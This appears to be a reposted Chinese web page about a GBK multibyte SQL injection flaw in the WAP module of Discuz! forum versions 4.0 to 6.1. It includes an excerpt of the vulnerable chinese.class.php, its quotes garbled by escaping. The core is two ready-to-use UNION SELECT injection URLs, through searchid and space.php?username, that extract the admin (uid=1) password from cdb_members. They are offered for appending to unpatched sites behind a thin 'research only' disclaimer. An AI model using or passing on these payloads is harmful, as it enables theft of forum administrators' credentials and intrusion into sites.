也想出现在这里? 联系我们

Discuz! wap功能模块编码的注射漏洞

作者 : 小编 本文共1918个字,预计阅读时间需要5分钟 发布时间: 2021-06-19 共4.7K人阅读
也想出现在这里? 联系我们

影响版本: Discuz!4.0.0 Discuz!4.1.0 Discuz!5.0.0 Discuz!5.5.0 Discuz!6.0.0 Discuz!6.1.0 描述: Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑 由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误 提交一个 \’ 转意成 \\\’ 然后转成gbk的,\\和\’就变成两个字符了 \’就可以成功的引入 测试方法: 以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!

复制代码

代码如下:

if(defined(\’IN_DISCUZ\’)) { exit(\’Access Denied\’); } define(\’CODETABLE_DIR\’, DISCUZ_ROOT.\’./include/tables/\’); class Chinese { var $table = \’\’; var $iconv_enabled = false; var $unicode_table = array(); var $config = array ( \’SourceLang\’ => \’\’, \’TargetLang\’ => \’\’, \’GBtoUnicode_table\’ => \’gb-unicode.table\’, \’BIG5toUnicode_table\’ => \’big5-unicode.table\’, ); function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) { $this->config[\’SourceLang\’] = $this->_lang($SourceLang); $this->config[\’TargetLang\’] = $this->_lang($TargetLang); if(!function_exists(’iconv’) && $this->config[\’TargetLang\’] != ‘BIG5′ && !$ForceTable) { $this->iconv_enabled = true; } else { $this->iconv_enabled = false; $this->OpenTable(); } } function _lang($LangCode) { $LangCode = strtoupper($LangCode); if(substr($LangCode, 0, 2) == ‘GB’) { return ‘GBK’; } elseif(substr($LangCode, 0, 3) == ‘BIG’) { return ‘BIG5′; } elseif(substr($LangCode, 0, 3) == ‘UTF’) { return ‘UTF-8′; } elseif(substr($LangCode, 0, 3) == ‘UNI’) { return ‘UNICODE’; } } function _hex2bin($hexdata) { for($i=0; $i < strlen($hexdata); $i += 2) { $bindata .= chr(hexdec(substr($hexdata, $i, 2))); } return $bindata; }

chinese.class.php (utf-8不能利用) searchid=22%cf\’UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit /space.php?username=%cf\’%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,password,50,51,52,53,54,55,56,57,database(),59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84%20from%20cdb_members%20where%20uid=1/* 直接放在url后面可以爆出id=1的用户密码,还可以自己根据需要更改,要注意一点的是,目标必须开了WAP,而且没有打上补丁,WAP浏览吧

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » Discuz! wap功能模块编码的注射漏洞

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录